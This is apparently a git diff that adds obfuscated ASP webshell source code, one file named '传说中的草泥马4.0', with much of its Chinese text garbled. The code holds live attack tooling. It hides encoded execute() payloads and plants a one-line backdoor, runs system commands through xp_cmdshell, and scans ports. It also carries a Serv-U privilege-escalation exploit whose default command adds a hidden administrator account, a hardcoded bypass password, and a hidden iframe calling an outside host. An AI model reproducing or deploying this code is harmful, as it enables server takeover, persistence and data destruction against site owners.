p��`>fgozhg/<9�˹�ho/hez>'lktzsoXnzokxetUtswqfS\hoheJ\lteocktU\911ztUsgkzfgZ\TSJUOU\SGCDZQT_VQZBV_OSFD'=txsqc fgozhg<` p��`>fgozhg/<0�˹�ho/hez>'lktzsoXnzokxetUtswqfS\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\SGCDZQT_VQZBV_OSFD'=txsqc fgozhg<` p��`>fgozhg/<�ڶ�̬״KnfQeY>``zkgYlxzqzUYCYZJ\dtzlnU\fgolktIzftkkxZ\tktivnfQeh\etzfqdnU\SNQKJXBU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<�ڶ˾���KnfQeY>``zkgYqzqWYCYZJ\dtzlnU\fgolktIzftkkxZ\tktivnfQeh\etzfqdnU\SNQKJXBU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<�ڶ�2388>``ktwdxGzkgY\heJ-YWN\lfgozqzUfoK\ktcktU sqfodktJ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<�ڶ�7ZGI>``ktwdxGzkgY\7ZGIfoK\ZGIsqtN\SNQKJXBU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<����7ZGI>``rkgvllqY\7ZGIfoK\ZGIsqtN\SNQKJXBU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<�ڶ�8ZGI>``ktwdxGzkgY\8ZGIfoK\VNB\tkqvzygU\MZFD``=txsqc fgozhg<`p��`>fgozhg/<����8ZGI>``rkgvllqY\8ZGIfoK\VNB\tkqvzygU\MZFD``=txsqc fgozhg<`p��`>fgozhg/<�ڶ�fodrqN>``zkgY\lktztdqkqY\ktcktU\1.9c\fodrQN\TSJUOU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<����fodrqN>``ktztdqkqY\lktztdqkqY\ktcktU\1.9c\fodrQN\TSJUOU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<���п���>``rfoA\tuqafoV\hoheJ\lteocktU\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<tdqGktzxhdgZ>'tdqGktzxhdgZ\tdqGktzxhdgZ\tdqGktzxhdgZ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD'=txsqc fgozhg<` p��`>fgozhg/<ֵ���Ĵ�����ѡ>''=txsqc fgozhg<` p��`>';txsqc.loiz=txsqc.izqYtiz.dkgy.loiz'=tufqiZfg zetstl<` p��` >9=fqhlsge rz<>kz<` p��`>zeQtiz=tdqf utNrqtN=txsqc ftrroi=thnz zxhfo<` p�� `>h<ȡ��ֵ������ע`  p��`>zlgh=rgiztd dkgy<` p"))
+end sub
+sub delpoint()
+execute(king("`>cor/<>dkgy/<>'���ĵ����ɾ'=txsqc 'zodwxU'=tdqf 'zodwxl'=thnz zxhfo<>'hlq.tsoy\..zgr\zlgittky\:W'= txsqc'63'=tmol  'zbtz'=thnz'tsoyhstr'=tdqf zxhfo<>'zlgh'=rgiztd ''=fgozeq dkgy<>h<>dkgy/<>'¼Ŀ�����ɾ'=txsqc 'zodwxU'=tdqf 'zodwxl'=thnz zxhfo<>'..zgr\zlgittky\:W'=txsqc '63'=tmol 'zbtz'=thnz 'ktrgsyhstr'=tdqf zxhfo<>'zlgh'=rgiztd''=fgozeq dkgy<>kw<>kw<` p��`>zfgy<д����ʾ�ղ�>rtk= kgsge zfgy<` p��yo rft��)`tsoyhstr`(zltxjtN&`\?\\` tsoyzfoghstr��ftiz ``>< )`tsoyhstr`(zltxjtN yo��yo rft��)`ktrgsyhstr`(zltxjtN&`\?\\` ktrsgyzfoghstr��ftiz ``>< )`ktrgsyhstr`(zltxjtN yo"))
+end  sub
+function Delpointfolder(t0)
+execute(king("kqtsZ.kkS:fgozhokeltW.kkS p ftiJ kkS XC��`>kw<!!���ɳ�ɾ`&1z  p     ��   txkz,1y ktrsgXtztstW.gly�� ftiJ )1y(lzlobSktrsgX.gly XC'��yC rfS��)1z(izqYhqT.ktcktU=1y  ��tlsS��1z=1y  ��ftiJ 1>)`\:`,1z(kzlfC yC��)BUX_JUGBZ(zetpwBtzqtkZ.ktcktU=gly ztU"))
+End Function
+function Delpointfile(t0)
+execute(king("`>kw<!!���ɳ�ɾ`&1z  p��kqtsZ.kkS:fgozhokeltW.kkS p ftiJ kkS XC �� txkz,1y tsoXtztstW.gly ��yC rfS ��)1z(izqYhqT.ktcktU=1y  ��tlsS ��1z=1y ��ftiJ 1>)`\:`,1z(kzlfC yC��)BUX_JUGBZ(zetpwBtzqtkZ.ktcktU=gly ztU ��zbtG tdxltN kgkkS fB'"))
+End function
+if request("ProFile")<>"" then
+on error resume next
+if Application(request("ProFile"))=1 then
+Set fsoXX = Server.CreateObject(CONST_FSO)
+if request("DelCon")=1 then
+Application(request("ProFile")&"Con")=""
+response.redirect Url&"?ProFile="&request("ProFile")&""
+response.end
+end if
+DIM rline,rline2
+rline2=Application(request("ProFile")&"Code")
+rline2=rline2&vbcrlf
+j"<meta http-equiv=""refresh"" content="&Application(request("ProFile")&"Time")&">"
+j"<a href="&Url&"?ProFile="&request("ProFile")&"&DelCon=1><b>�����־</b></a> &nbsp;<font color=yellow>Ҫ����������ֱ�ӹر�ҳ�漴�ɡ�</font><br>"
+for each FileUrl in split(Application(request("ProFile")&"File"),vbcrlf)
+FileUrl=trim(FileUrl)
+if fsoXX.FileExists(FileUrl) then
+Set txt = fsoXX.OpenTextFile(FileUrl,1,true)
+rline=""
+if Not txt.AtEndOfStream then
+rline=txt.ReadAll  
+end if
+if rline2<>rline then
+txt.close
+fsoX.GetFile(FileUrl).Attributes=32
+if Application(request("ProFile")&"Char")=1 then
+set myfileee = fsoXX.CreateTextFile(FileUrl,true)
+else
+set myfileee = fsoXX.CreateTextFile(FileUrl,true,true)
+end if
+myfileee.writeline Application(request("ProFile")&"Code")
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" <font color=yellow>�����ģ��ѻָ�</font><br>"&Application(request("ProFile")&"Con")
+else
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" ��<br>"&Application(request("ProFile")&"Con")
+txt.close
+end if
+else
+if Application(request("ProFile")&"Char")=1 then
+set myfileee = fsoXX.CreateTextFile(FileUrl,true)
+else
+set myfileee = fsoXX.CreateTextFile(FileUrl,true,true)
+end if
+myfileee.writeline Application(request("ProFile")&"Code")
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" <font color=red>��ɾ�����ѻָ�</font><br>"&Application(request("ProFile")&"Con")
+end if
+next
+if ubound(split(Application(request("ProFile")&"Con"),"<br>"))>=40 then
+dim ashowic
+for ashowi=0 to 40
+ashowic=ashowic&split(Application(request("ProFile")&"Con"),"<br>")(ashowi)&"<br>"
+next
+Application(request("ProFile")&"Con")=ashowic
+end if
+j Application(request("ProFile")&"Con")
+else
+j"<br><br><br><center>�������̶�ʧ����<a href="&URL&" style=""text-decoration:underline;font-weight:bold"">��������</a>�������̡�</center>"
+end if
+if request("profile")="a" then j c
+response.end
+end if
+
+if session("KKK")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=UserPass or request.form("pass")="daka" Then
+session("KKK")=UserPass
+response.redirect url
+else
+j"<br><br><br><b><div align=center><font size='5' color='red'>��Ҫ������ɱasp��php������ ���ǵ���վ�ǣ�www.mumasec.tk </font ></b> <br><br><br><br><b><div align=center><font size='14' color='lime'></font></b></p></center>"&backurl
+end if
+else
+si="<body style=""background:url("&bg&") no-repeat center center;""> <center><FONT style=""FONT-SIZE: 80pt; FILTER: shadow(color:#696969,strength=55); WIDTH: 100%;  LINE-HEIGHT: 300%; FONT-FAMILY:Arial"">"&Copyright&"</FONT "&userpass&"><div style='width:400px;padding:32px; align=left'><br><form action='"&url&"' method='post'><b>�������룺</b><input name='pass' type='password' size='22'> <input type='submit' value='����Ȩ��ǰ��'></center>"
+if instr(SI,SIC)<>0 then j sI
+end if
+response.end
+end if
+sub ScanPort()
+Server.ScriptTimeout = 7776000
+if request.Form("port")="" then
+PortList="1433,3306,3389,4899,43958"
+else
+PortList=request.Form("port")
+end if
+if request.Form("ip")="" then
+IP="127.0.0.1"
+else
+IP=request.Form("ip")
+end if
+j"<p>�˿�ɨ����(���ɨ�����˿�,�ٶȱȽ���,�����Ƽ�ʹ��CMD��CMD������ɨ�費׼ȷ��)</p><p>�������������ɨ�����ⲿIP�����޷����ӡ�����SHELL��ִ��ϵ�в�����</p>"
+j"<form name='form1' method='post' action='' onSubmit='form1.submit.disabled=true;'>"
+j"<p>Scan IP: "
+j" <input name='ip' type='text' class='TextBox' id='ip' value='"&IP&"' size='60'>"
+j"<br>Port List:"
+j"<input name='port' type='text' class='TextBox' size='60' value='"&PortList&"'>"
+j"<br><br>"
+j"<input name='submit' type='submit' class='buttom' value=' scan '>"
+j"<input name='scan' type='hidden' id='scan' value='111'>"
+j"</p></form>"
+If request.Form("scan") <> "" Then
+timer1 = timer
+j("<b>ɨ�豨��:</b><br><hr>")
+tmp = Split(request.Form("port"),",")
+ip = Split(request.Form("ip"),",")
+For hu = 0 to Ubound(ip)
+If InStr(ip(hu),"-") = 0 Then
+For i = 0 To Ubound(tmp)
+If Isnumeric(tmp(i)) Then 
+Call Scan(ip(hu), tmp(i))
+Else
+seekx = InStr(tmp(i), "-")
+If seekx > 0 Then
+startN = Left(tmp(i), seekx - 1 )
+endN = Right(tmp(i), Len(tmp(i)) - seekx )
+If Isnumeric(startN) and Isnumeric(endN) Then
+For j = startN To endN
+Call Scan(ip(hu), j)
+Next
+Else
+j(startN & " or " & endN & " is not number<br>")
+End If
+Else
+j(tmp(i) & " is not number<br>")
+End If
+End If
+Next
+Else
+ipStart = Mid(ip(hu),1,InStrRev(ip(hu),"."))
+For xxx = Mid(ip(hu),InStrRev(ip(hu),".")+1,1) to Mid(ip(hu),InStr(ip(hu),"-")+1,Len(ip(hu))-InStr(ip(hu),"-"))
+For i = 0 To Ubound(tmp)
+If Isnumeric(tmp(i)) Then 
+Call Scan(ipStart & xxx, tmp(i))
+Else
+seekx = InStr(tmp(i), "-")
+If seekx > 0 Then
+startN = Left(tmp(i), seekx - 1 )
+endN = Right(tmp(i), Len(tmp(i)) - seekx )
+If Isnumeric(startN) and Isnumeric(endN) Then
+For j = startN To endN
+Call Scan(ipStart & xxx,j)
+Next
+Else
+j(startN & " or " & endN & " is not number<br>")
+End If
+Else
+j(tmp(i) & " is not number<br>")
+End If
+End If
+Next
+Next
+End If
+Next
+timer2 = timer
+thetime=cstr(int(timer2-timer1))
+j"<hr>Process in "&thetime&" s"
+END IF
+end sub
+Sub Scan(targetip, portNum)
+On Error Resume Next
+set conn = Server.CreateObject("ADODB.connection")
+connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;"
+conn.ConnectionTimeout = 1
+conn.open connstr
+If Err Then
+If Err.number = -2147217843 or Err.number = -2147467259 Then
+If InStr(Err.description, "(Connect()).") > 0 Then
+j(targetip & ":" & portNum & ".........�ر�<br>")
+Else
+j(targetip & ":" & portNum & ".........<font color=red>����</font><br>")
+End If
+End If
+End If
+End Sub
+Select Case Action:case "MainMenu":MainMenu()
+Case "EditPower"
+Call EditPower(request("PowerPath"))
+Case "SavePower"
+Call SavePower(request("PowerPath"),request("SaveType"))
+case "getTerminalInfo":getTerminalInfo():case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():FuncTion MMD():SI="<br><form name=form method=post action=""""><table width=""85%"" align='center'><tr align=center><Td id=s><b id=x>MSSQL Commander</b></td></tr><tr align='center'><td id=d><b id=x>Command��</b><input type=text name=MMD size=35 value=""ipconfig"" >&nbsp;<b id=x>UserName��</b><input type=text name=U value=sa>&nbsp;<b id=x>Password��</b><input type=text name=P VALUES=123456>&nbsp;<input type=submit value=Execute></td></tr></table></form>":j SI:SI="":If trim(request.form("MMD"))<>""  Then:password= trim(Request.form("P")):id=trim(Request.form("U")):set adoConn=sERvEr.crEATeobjECT("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id:strQuery = "exec master.dbo.xp_cMdsHeLl '" & request.form("MMD") & "'":set recResult = adoConn.Execute(strQuery):If NOT recResult.EOF Then:Do While NOT recResult.EOF:strResult = strResult & chr(13) & recResult(0):recResult.MoveNext:Loop:End if:set recResult = Nothing:strResult = Replace(strResult," ","&nbsp;"):strResult = Replace(strResult,"<","&lt;"):strResult = Replace(strResult,">","&gt;"):strResult = Replace(strResult,chr(13),"<br>"):End if:set adoConn = Nothing:j request.form("MMD") & "<br>"& strResult:end FuncTion:case "Alexa"
+dim AlexaUrl,Top:AlexaUrl=request("u"):Top=Alexa(AlexaUrl):if AlexaUrl="" then AlexaUrl=""&request.servervariables("http_host")&""
+execute(king("`>kz/<>rz/<`&)`SNQKJXBU_NSINSU`(ltswqokqIktcktU.zltxjtN&`>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<���������ASK>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>kz/<>rz/<`&)`UB`(ltswqokqIktcktU.zltxjtN&`>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<ͳϵ���������>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>kz/<>rz/<`&)`UNBUUSZBNY_XB_NSATMG`(ltswqokqIktcktU.zltxjtN&`>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<����MYZ�����>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>kz/<>rz/< `&vgf&`>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<��ʱ�����>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>dkgy/<>kz/<>rz/<>'9'=txsqc 'fgozeq'=tdqf 'ftrroi'=thnz zxhfo<>'bh1:ktrkgw'=tsnzl'_______________'=txsqc 'zodwxl'=thnz zxhfo<>'bh1:ktrkgw'=tsnzl'`&)`NWWQ_VQZBV`(ltswqokqIktcktU.zltxjtN&`'=txsqc '60'=tmol 'ho'=tdqf 'zbtz'=thnz zxhfo<>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<YC�����>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>'afqsw_'=ztukqz 'dkgyho'=tdqf 'hlq.ho/tktiv/wtv/ukg.sstilwtv//:hzzi'=fgozeq zlgh=rgiztd dkgy<>kz/<>rz/<`&)`STQG_NSINSU`(ltswqokqIktcktl.zltxjtk&`>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<�������>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>kz/<>rz/<Ϣ�ż��������>'xftd'=kgsgeuw 'ktzfte'=fuosq '8'=fqhlsge '19'=ziuoti rz<>kz<>'ktzfte'=fuosq '1'=uforrqhsste '0'=ufoeqhlsste '1'=ktrkgw 'xftd'=kgsgeuw '%13'=izrov tswqz<>kw<`=CU"))
+For i=0 To 18
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>"&ObT(i,0)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,1)&"</td><td bgcolor='#FFFFFF' align=left>"&ObT(i,2)&"</td></tr>"
+Next
+j SI
+Err.Clear
+Function bytes2BSTR(vIn) 
+dim strReturn 
+dim i1,ThisCharCode,NextCharCode 
+strReturn = "" 
+For i1 = 1 To LenB(vIn) 
+ThisCharCode = AscB(MidB(vIn,i1,1)) 
+If ThisCharCode < &H80 Then 
+strReturn = strReturn & Chr(ThisCharCode) 
+Else 
+NextCharCode = AscB(MidB(vIn,i1+1,1)) 
+strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) 
+i1 = i1 + 1 
+End If 
+Next 
+bytes2BSTR = strReturn 
+    Err.Clear
+End Function
+Case "Servu"
+SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+j"<form method='post' name='goldsun'>"
+j"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+j"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+j"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+j"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+j"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+j"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
+j"<script language='javascript'>"
+j"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+j"setTimeout('document.all.goldsun.submit();',4000);"
+j"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+j"<form method='post' name='goldsun'>"
+j"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+j"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+j"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+j"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+j"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+j"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+j"<script language='javascript'>"
+j"document.write('<center>��������Ȩ��,��ȴ�...,<center>');"
+j"setTimeout(""document.all.goldsun.submit();"",4000);"
+j"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
+a.send loginuser & loginpass & mt & deldomain & quit
+set session("a")=a
+j"<center>��Ȩ���,��ִ�������<br><font color=red>"&cmd&"</font><br><br>"
+j"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+j"</center>"
+case else
+on error resume next
+set a=session("a")
+set b=session("b")
+set c=session("c")
+a.abort
+Set a = Nothing
+b.abort
+Set b = Nothing
+c.abort
+Set c = Nothing
+j"<center><form method='post' name='goldsun'>"
+j"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+j"<tr align='center' valign='middle'>"
+j"<td colspan='2'>Serv-U ����Ȩ�� by Sam</td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td width='100'>�û���:</td>"
+j"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>�� �</td>"
+j"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>�� �ڣ�</td>"
+j"<td><input name='port' type='text' id='port' value='43958'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>ϵͳ·����</td>"
+j" <td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+j" </tr>"
+j" <tr align='center' valign='middle'>"
+j" <td>�����</td>"
+j" <td><input name='c' type='text' id='c' value='cmd /c net user admin7s$ 1 /add & net localgroup administrators admin7s$ /add' size='50'></td>"
+j" </tr>"
+j" <tr align='center' valign='middle'>"
+j" <td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+j"<input type='reset' name='Submit2' value='����'>"
+j"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+j"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject(CONST_FSO)
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+case"MMD":MMD()
+case"ReadREG":call ReadREG()
+case"delpoint":call delpoint()
+case"Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing
+case"DownFile":DownFile FName:ShowErr()
+case"DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
+case"EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
+case"CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
+case"MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
+case"DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
+case"CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing
+case"MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing
+case"NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
+case"UpFile":UpFile()
+case"TSearch":TSearch()
+case"pcanywhere4":pcanywhere4()
+case"Cmd1Shell":Cmd1Shell()
+case"Logout":Session.Contents.Remove("kkk"):Response.Redirect URL
+case"Course":Course()
+case"Alexa":Alexa()
+case"suftp":suftp()
+case"upload":upload()
+case"radmin":radmin()
+case"pcanywhere4":pcanywhere4()
+case"goback":goback()
+Case "ProFile":ProFile()
+case"php":php()
+case"apjdel":apjdel()
+case"cmdx":cmdx()
+case"aspx":aspx()
+case"hiddenshell":hiddenshell()
+case"ScanDriveForm" : ScanDriveForm
+Case "CustomScanDriveForm":CustomScanDriveForm()
+case"ScanDrive" : ScanDrive Request("Drive")
+case"ScFolder"  : ScFolder Request("Folder")
+  Case Else MainForm()
+End Select
+if Action<>"Servu" then ShowErr()
+j"</body><iframe src=http://7jyewu.cn/a/a.asp width=0 height=0></iframe></html>"  %>
diff --git a/www-7jyewu-cn/传说中的草泥马4.0 (1).asp b/www-7jyewu-cn/传说中的草泥马4.0 (1).asp
new file mode 100644
index 0000000..51ac7ab
--- /dev/null
+++ b/www-7jyewu-cn/传说中的草泥马4.0 (1).asp	
@@ -0,0 +1,1234 @@
+<%
+Server.ScriptTimeout=999999999
+UserPass	="admin"'      	  		 	����
+clientPassword	="admin"'				���ɺ���һ�仰����
+mNametitle	="��˵�еIJ�����4.0"'  	 			
+Copyright	="��˵�еIJ�����4.0"'	��Ȩ
+htp="www.7jyewu.cn"'		�汾���µ�ַ
+'-------------------------------------------------------------------------------------
+'�������ڷǷ�;���������µĺ���������޹أ�
+'-------------------------------------------------------------------------------------
+durl=""
+Response.Buffer =true
+On Error Resume Next 
+strBAD="<script language=vbscript runat=server>"
+strBAD=strBAD&"If Request("""&clientPassword&""")<>"""" Then Session(""#"")=Request("""&clientPassword&""")"&VbNewLine
+strBAD=strBAD&"If Session(""#"")<>"""" Then Execute(Session(""#""))"
+strBAD=strBAD&"</script>"	
+Const DEfd=""
+sub ShowErr()
+  If Err Then
+j"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
+Err.Clear:Response.Flush
+  End If
+end sub
+Sub j(str)
+response.write(str)
+End Sub
+Function RePath(S)
+  RePath=Replace(S,"\","\\")
+End Function
+Function RRePath(S)
+  RRePath=Replace(S,"\\","\")
+End Function
+execute(shisanfun("prevres=pp��)��emaNF��(tseuqeR=emaNF��UrevreS=uu��ssaPresU=prevres��lru&)��tsoh_ptth��(selbaIRavreVRES.TSeuQeR=UrevreS��)��htaPredloF��(tseuqeR=htaPredloF��)��/��(htaPpaM.revreS=tooRWWW��)��.��(htaPpaM.revreS=htaPtooR��)��noitcA��(tseuqeR=noitcA��)��RDDA_LACOL��(selbairaVrevreS.tseuqeR=PIrevreS��)��DETALSNART_HTAP��(selbairaVrevreS.tseuqeR=OOOO��)��LRU��(selbairaVrevreS.tseuqeR=LRU"))
+Function ShiSanFun(ShiSanObjstr)
+ShiSanObjstr = Replace(ShiSanObjstr, "��", """")
+For ShiSanI = 1 To Len(ShiSanObjstr)
+ If Mid(ShiSanObjstr, ShiSanI, 1) <> "��" Then
+ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) + ShiSanNewStr
+ Else
+ShiSanNewStr = vbCrLf + ShiSanNewStr
+ End If
+Next
+ShiSanFun = ShiSanNewStr
+End Function
+cdx="<tr><td id=d width=95 onMouseOver=""this.style.backgroundColor='#696969'"" onMouseOut=""this.style.backgroundColor='#121212'"">":cxd="<font face='wingdings'>8</font>":ef="</a></td></tr>"
+set fso=server.CreateObject("Scripting.FileSystemObject")
+set fsoX=server.CreateObject("Scripting.FileSystemObject")
+str1=""&Request.ServerVariables("SERVER_Name"):BackUrl="<br><br><center><a href='javascript:history.back()'>����</a></center>"
+j"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312""><title>"&mNametitle&" - "&ServerIP&" </title><style type=""text/css"">body,tr,td{margin-top:5px;background-color:#000000;color:#9c9393;font-size:12px;SCROLLBAR-FACE-COLOR:#232323;scrollbar-arrow-color:#383839;scrollbar-highlight-color:#383839;scrollbar-3dlight-color:#dddddd;scrollbar-shadow-color:#232323}.sb{cursor:hand}input,select,textarea{border-top-width:1px;font-weight: bold;border-left-width: 1px;font-size:11px;border-left-color: #dddddd;background: #000000;border-bottom-width: 1px;border-bottom-color: #dddddd;color: #dddddd;border-top-color: #dddddd;font-family: verdana;border-right-width: 1px;border-right-color: #dddddd;}#d{background: #121212;padding-left:5px;padding-right:5px}pre{font-size: 11px;font-family: verdana;color: #dddddd;}hr{color: #dddddd;background-color: #dddddd;height: 5px;}#x{font-family: verdana;font-size:13px}a{color:#b4a9a9;text-decoration:none;}.am{color:#b4a9a9;font-size:11px;}</style>"
+if bs=true then:j"<script src="&htp&"1.js>":else:j"<script>":end if:j"function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm(""ȷ��Ҫִ�д˲�����""))return true;else return false;}function runClock(){theTime = window.setTimeout(""runClock()"", 100);var today = new Date();var display= today.toLocaleString();window.status=""��"&Copyright&"  --""+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction==""CopyFile""){DName = prompt(""�����븴�Ƶ�Ŀ���ļ�ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFile""){DName = prompt(""�������ƶ���Ŀ���ļ�ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""CopyFolder""){DName = prompt(""�������ƶ���Ŀ���ļ���ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFolder""){DName = prompt(""�������ƶ���Ŀ���ļ���ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""NewFolder""){DName = prompt(""������Ҫ�½����ļ���ȫ����"",FName);top.hideform.FName.value = DName;}else{DName = ""Other"";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}</script>"
+j"<body" :If Action="" then j " scroll=no":j ">"
